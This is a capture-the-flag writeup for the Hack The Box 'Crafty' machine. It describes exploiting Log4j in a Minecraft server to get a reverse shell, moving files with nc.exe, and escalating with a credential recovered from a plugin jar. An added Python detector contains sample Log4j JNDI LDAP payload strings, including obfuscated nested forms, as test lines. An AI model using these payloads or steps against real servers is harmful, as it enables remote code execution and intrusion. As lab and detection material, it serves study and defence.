Crafty HTB Writeup | HacktheBox

Introduction

In this post, let’s see how to CTF Crafty from HTB. If you have any doubts, comment down below 👇🏾

Hacking Phases in Crafty

  • Add IP to /etc/hosts
  • Nmap Scan
  • Site Enumeration
  • Credential Harvest
  • User Enumeration
  • Privilege Escalation

Let’s Begin

Let’s Hack Crafty HTB 😌

Nmap Scan

To kick things off, I start our exploration by running an Nmap scan.

Port 25565 indicates the presence of a Minecraft server. Next, I add “crafty.htb” to my hosts file along with the machine’s IP address using this command:

echo "10.10.11.249 crafty.htb" >> /etc/hosts

Website Enumeration

When I visited “crafty.htb”, I found a Minecraft introduction page.

To connect to the server, I need to download the Minecraft client on my Kali system. I found a helpful link to guide me through installing Minecraft on Linux.

I followed the video and successfully installed the Minecraft client. After logging in with my account, I was able to see the following screen.

Clicking on “Multiplayer” allowed me to enter the server.

After searching online, I found a Log4j Minecraft Remote Code Execution (RCE) vulnerability. Thanks to Kozmer, I obtained a proof of concept (PoC) for this vulnerability.

POC

Since I was going to pentest a Windows machine, I modified the cmd variable as follows.

Then, I ran this PoC and obtained an LDAP URL.

I also opened a reverse shell.

Back in the game, I could send chat messages to other players.

User Enum

So, I could simply send the LDAP URL payload to obtain a reverse shell with my Kali machine.

And it worked! Finally, I got the user flag.
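
Seen from the defender's side, a chat message like the one described above ends up in the Minecraft server log as a JNDI lookup string. The following is an added example, not part of the original writeup or of any PoC: it scans chat log lines for JNDI lookups, including ones hidden behind nested Log4j lookups. The log lines, player names and the 192.0.2.10 address are constructed, and the function names are hypothetical.

```python
import re

INNER = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...}, no nesting inside
JNDI = re.compile(r"\$\{\s*jndi:(\w+)://([^/}\s]+)", re.IGNORECASE)

def resolve_inner(expr):
    """Return the text a nested lookup would expand to, or None if unknown."""
    low = expr.lower()
    if low.startswith("jndi:"):
        return None                       # the lookup we want to find; keep it intact
    if low.startswith(("lower:", "upper:")):
        return expr.split(":", 1)[1]      # case does not matter, JNDI matches ignore it
    if ":-" in expr:
        return expr.split(":-", 1)[1]     # ${key:-default} falls back to the default
    return None

def normalize(line, max_rounds=10):
    """Repeatedly expand innermost lookups until the line stops changing."""
    def expand(m):
        resolved = resolve_inner(m.group(1))
        return m.group(0) if resolved is None else resolved
    for _ in range(max_rounds):
        new = INNER.sub(expand, line)
        if new == line:
            break
        line = new
    return line

def scan(lines):
    """Return (line_number, scheme, target) for every JNDI lookup found."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits

# Constructed log lines in Minecraft server chat format (not from the box).
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: <steve> anyone seen the jndi patch notes?",
    "[12:00:09] [Server thread/INFO]: <guest1> ${jndi:ldap://192.0.2.10:1389/a}",
    "[12:00:15] [Server thread/INFO]: <alex> diamonds cost ${5} each",
    "[12:00:22] [Server thread/INFO]: <guest2> ${${lower:J}ndi:${::-l}dap://192.0.2.10:1389/a}",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit gives the line number, the JNDI scheme and the host the server was asked to contact, which is the address to look for in outbound connection logs.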

Privilege Escalation

While exploring the machine, I found an interesting .jar file in C:\Users\svc_minecraft\server\plugins.

To move this file to my Kali for decompilation, I attempted to use nc.exe for the transfer. To proceed, I needed to first move nc.exe to this box.

I used the following commands to move this .jar file:

By opening this file with JD-GUI, I found a credential in the “Playercounter.class”.

And I decided to use this credential to open a new reverse shell as the user Administrator.

It worked, and I also obtained the root flag.

Conclusion

In conclusion, the Crafty box provided an engaging challenge, showcasing various aspects of penetration testing and exploitation.

From identifying Minecraft server vulnerabilities to leveraging LDAP payloads for reverse shells, the box offered a diverse set of tasks.

Through careful exploration and exploitation of vulnerabilities, I was able to escalate privileges, ultimately gaining access to both user and root flags. This experience reinforced my understanding of security vulnerabilities and the importance of thorough testing and mitigation strategies.